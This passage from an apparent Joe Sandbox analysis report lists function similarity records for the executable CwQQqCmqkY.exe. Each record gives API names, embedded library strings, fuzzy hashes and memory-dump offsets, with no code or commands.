                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: _get_daylight$_invalid_parameter_noinfo
                    • String ID: ?
                    • API String ID: 1286766494-1684325040
                    • Opcode ID: 37a553c7527bd543dc6276df0fd9bd9768d557c111b77fafda1d1b197a3b9ba2
                    • Instruction ID: 7d641117a018b12b38384406e78f32a94ffa156909b4f6e9ef4ff93778959e8d
                    • Opcode Fuzzy Hash: 37a553c7527bd543dc6276df0fd9bd9768d557c111b77fafda1d1b197a3b9ba2
                    • Instruction Fuzzy Hash: 97410822A183C247FB64B729D40137AA660FFA27A4F50427CEE7C06AD5DF7CE4418790
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: CreateFrameInfo__except_validate_context_record
                    • String ID: csm
                    • API String ID: 2558813199-1018135373
                    • Opcode ID: 983355fe70a118a201ee6b154a3b4dc70e69ec82075dc0b3f9cee40ae7098288
                    • Instruction ID: a8d13491ea15add78219d353a405a453b31efd10cb45c96cf1c64722d450ad14
                    • Opcode Fuzzy Hash: 983355fe70a118a201ee6b154a3b4dc70e69ec82075dc0b3f9cee40ae7098288
                    • Instruction Fuzzy Hash: 24515C33B18B4187E724AB55E08026EB7E4FB89B94F500138EBAD47B95DF78E460CB50
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID:
                    • String ID: SSL/TLS connection timeout$select/poll on SSL/TLS socket, errno: %d
                    • API String ID: 0-3791222319
                    • Opcode ID: 9728ec57a8b6dc9e8df3295354214f157902797ebfe5cf179fe86f855c5db0cc
                    • Instruction ID: 84c799b9e2cdd6d620c19dd0637678fbbc016922026a95a053ff1ffc93b6e0f7
                    • Opcode Fuzzy Hash: 9728ec57a8b6dc9e8df3295354214f157902797ebfe5cf179fe86f855c5db0cc
                    • Instruction Fuzzy Hash: 1041A331B086428AFB24EAA5550037DAB92AF55BB4F500230DF78977D5EFBDE401E3A1
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: SimpleString::operator=
                    • String ID: %u%.2s-%.2s-%.2s %.2s:%.2s:%.2s %.*s$GMT
                    • API String ID: 356670603-632690687
                    • Opcode ID: 8d8ecf81a9b54caeca7e35ffe43549cd2122f8e82b3cf4901bbedd6dd3d04f51
                    • Instruction ID: 9636d81039c6fe47d0ce449c95ad03c664eb0fc37599f3bd3ced0ab0b0374def
                    • Opcode Fuzzy Hash: 8d8ecf81a9b54caeca7e35ffe43549cd2122f8e82b3cf4901bbedd6dd3d04f51
                    • Instruction Fuzzy Hash: 1841B922B1DB9746FB14ABA495501B9E791EF01384FC44031DABE876D5DFACE901CBE0
                    APIs
                    • _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F131371E
                      • Part of subcall function 00007FF7F131B6E0: RtlFreeHeap.NTDLL(?,?,?,00007FF7F1324076,?,?,?,00007FF7F13243F3,?,?,00000000,00007FF7F1324A8D,?,?,?,00007FF7F13249BF), ref: 00007FF7F131B6F6
                      • Part of subcall function 00007FF7F131B6E0: GetLastError.KERNEL32(?,?,?,00007FF7F1324076,?,?,?,00007FF7F13243F3,?,?,00000000,00007FF7F1324A8D,?,?,?,00007FF7F13249BF), ref: 00007FF7F131B700
                    • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF7F12FA0A5), ref: 00007FF7F131373C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                    • String ID: C:\Users\user\Desktop\CwQQqCmqkY.exe
                    • API String ID: 3580290477-871237861
                    • Opcode ID: 70e68d63190dd7d42ae22c2bbe47d69c5823176e76e8a640f97d9137ae306624
                    • Instruction ID: d5fe212c7291729365616099c00a450bebbcb55046b56119d4058ecfe68c284a
                    • Opcode Fuzzy Hash: 70e68d63190dd7d42ae22c2bbe47d69c5823176e76e8a640f97d9137ae306624
                    • Instruction Fuzzy Hash: 04417F36E08A0687EB15FF21A4500B9A7A4EF447B4F96403DE92E53BC5DF7CE45583A0
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: CurrentDirectory_invalid_parameter_noinfo
                    • String ID: .$:
                    • API String ID: 2020911589-4202072812
                    • Opcode ID: 479fa97cf75959233c02aa414595ef90de64ce64c51a8ac9b9c6db666e49bdd9
                    • Instruction ID: 4af372435ec62465579c494e318656d8f18153cbb7f0ee3174feda1e81b3b7a0
                    • Opcode Fuzzy Hash: 479fa97cf75959233c02aa414595ef90de64ce64c51a8ac9b9c6db666e49bdd9
                    • Instruction Fuzzy Hash: D2414F23F047928AF711BBB098501FC6BB47F25758F940039DE5D67AC9EFB8A44283A1
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: ErrorFileLastWrite
                    • String ID: U
                    • API String ID: 442123175-4171548499
                    • Opcode ID: 6e8563c5b4ddc9b5cb7fffe8ac04eb9d292b14906fe36700204e3e4ae3b93c0c
                    • Instruction ID: 57876d9818cc76998e9622e231ad90566def98bd2a4a1fac2a7df95b539078d4
                    • Opcode Fuzzy Hash: 6e8563c5b4ddc9b5cb7fffe8ac04eb9d292b14906fe36700204e3e4ae3b93c0c
                    • Instruction Fuzzy Hash: F241C532B18A8582DB20EF25E4447A9B7A0FB88794F854035EE5D97794DFBCE441C790
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: SimpleString::operator=
                    • String ID: %02x:$%s%x
                    • API String ID: 356670603-2591467423
                    • Opcode ID: d2878c648100b2881ed4bfe436baa5d0c478045c5434fad2aa667b7296cdf4c3
                    • Instruction ID: 657440fb34a7677f3e382b04ae36d71e1f428910faebe344155b1c5c7b178895
                    • Opcode Fuzzy Hash: d2878c648100b2881ed4bfe436baa5d0c478045c5434fad2aa667b7296cdf4c3
                    • Instruction Fuzzy Hash: 6431D421B1C6974AFB10B7A495101B8EA92EF01794FC44031CA7EC6ADADFDDE90187E0
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: recvfrom
                    • String ID: Internal error: Unexpected packet$Received too short packet
                    • API String ID: 846543921-1028201440
                    • Opcode ID: 8210a76b63fd3a0f6975eccaac57bf1e9065c2e58e6301ce707c276d9f40b9c7
                    • Instruction ID: 00dd834471d336f40b54bb56508a1281e3967f37fef6ab841d8ab9531a5868bf
                    • Opcode Fuzzy Hash: 8210a76b63fd3a0f6975eccaac57bf1e9065c2e58e6301ce707c276d9f40b9c7
                    • Instruction Fuzzy Hash: 8D31D272B0868197EB58AB65D5407F9B360FB84740F804036DB6D83B91DF7CE064CB90
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: CurrentDirectory
                    • String ID: :
                    • API String ID: 1611563598-336475711
                    • Opcode ID: 5ec83d298f407259a771167eb92e0c40f156219ea944346157fe9a0b9e2eb34d
                    • Instruction ID: 0a801e26c9458a96d7b87e9824256e511a1a31e4cbf8c74a058b82edad644df2
                    • Opcode Fuzzy Hash: 5ec83d298f407259a771167eb92e0c40f156219ea944346157fe9a0b9e2eb34d
                    • Instruction Fuzzy Hash: 1B21A222E0864182EB20AB15D04427DA3B5FF88B54FCA4039DAAD532C8DFBCE95587E1
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: EncodersGdipImage$Size
                    • String ID: image/jpeg
                    • API String ID: 864223233-3785015651
                    • Opcode ID: 364082913471cc1bce98faaa2a27da98f1b88bbe6c8586cf350d8ce91eef34fa
                    • Instruction ID: af85272512aa26895fcb5bf72befbae966bff7944654ca3b524b6b5475254c13
                    • Opcode Fuzzy Hash: 364082913471cc1bce98faaa2a27da98f1b88bbe6c8586cf350d8ce91eef34fa
                    • Instruction Fuzzy Hash: CF117222B0868187E745BB15D84027CA7A1FFC5B94F954138EA6D473D5DFBCE881C7A0
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: SimpleString::operator=
                    • String ID: FALSE$TRUE
                    • API String ID: 356670603-1412513891
                    • Opcode ID: f57f590c7a645efb81a6b283e02ee9fa9dc9ace802bd093afb5acd33ec3bd2f8
                    • Instruction ID: 2defa8020c94718c5cb5672e68ff53cf52c22802c947dc8997cbce2c9fec51d8
                    • Opcode Fuzzy Hash: f57f590c7a645efb81a6b283e02ee9fa9dc9ace802bd093afb5acd33ec3bd2f8
                    • Instruction Fuzzy Hash: E8118E22B08B5685FB10ABA4D4403E9A760FB05798FC00036DE2D977C8DFADE585C7E0
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: AddressHandleModuleProcgetsockoptsetsockopt
                    • String ID: @
                    • API String ID: 1224256098-2726393805
                    • Opcode ID: 06bfb4e12416a55a223a168bbc2d61aaa1b3c69214bf1b0d0a235fc5a93a684e
                    • Instruction ID: a3e476d4a33488b77d8b4c2eda46ad48ff6bf0028dd7942c1302c2125a9b75e2
                    • Opcode Fuzzy Hash: 06bfb4e12416a55a223a168bbc2d61aaa1b3c69214bf1b0d0a235fc5a93a684e
                    • Instruction Fuzzy Hash: 6A11827161864287F720DF58E404766E790EF89384F900039EB9886BE4EBFDE588DB54
                    APIs
                    • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,00007FF7F12FB6A6), ref: 00007FF7F12FF350
                    • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,00007FF7F12FB6A6), ref: 00007FF7F12FF391
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: ExceptionFileHeaderRaise
                    • String ID: csm
                    • API String ID: 2573137834-1018135373
                    • Opcode ID: 5f6c5fd28280d0b02f5447f45ce21c084bfd2a21dcf626562afa2701c58c8ecf
                    • Instruction ID: 1be1a9a74b8074e7542ac7c72092ae4c505c5399c65e3308e960c9fff887365b
                    • Opcode Fuzzy Hash: 5f6c5fd28280d0b02f5447f45ce21c084bfd2a21dcf626562afa2701c58c8ecf
                    • Instruction Fuzzy Hash: 05116A32718B8182EB659F15F400269B7E1FB88B94F984234EEAC47BA8DF7CD5518B40
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_Yarn
                    • String ID: bad locale name
                    • API String ID: 1838369231-1405518554
                    • Opcode ID: 410544f41d4b5e3e6b714d04c352ed36dece5a0e14acac82e9e59760611a0e7b
                    • Instruction ID: b88860400f8b856b5ee0657808cda731b36835f8d46e12f8b858cb44c933d11e
                    • Opcode Fuzzy Hash: 410544f41d4b5e3e6b714d04c352ed36dece5a0e14acac82e9e59760611a0e7b
                    • Instruction Fuzzy Hash: 8701A222606B818AC744EFB5A88016CB7A5FB58B84F585139CBACC375EEF38C490C390
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: DriveType_invalid_parameter_noinfo
                    • String ID: :
                    • API String ID: 2595371189-336475711
                    • Opcode ID: af85d741f3db546a8d84b983b8825c1f588caf6b7c6837e14d3c8fbfda4b5940
                    • Instruction ID: 72c38fba61c8eb6d2f8c7ad2ca01a971f950aac5140fa650d503d2cdf6c4b3b8
                    • Opcode Fuzzy Hash: af85d741f3db546a8d84b983b8825c1f588caf6b7c6837e14d3c8fbfda4b5940
                    • Instruction Fuzzy Hash: 7E01B121A1828387E720BF60946127EE3A0FF55748FC40039D96D826C5DFACE90486B4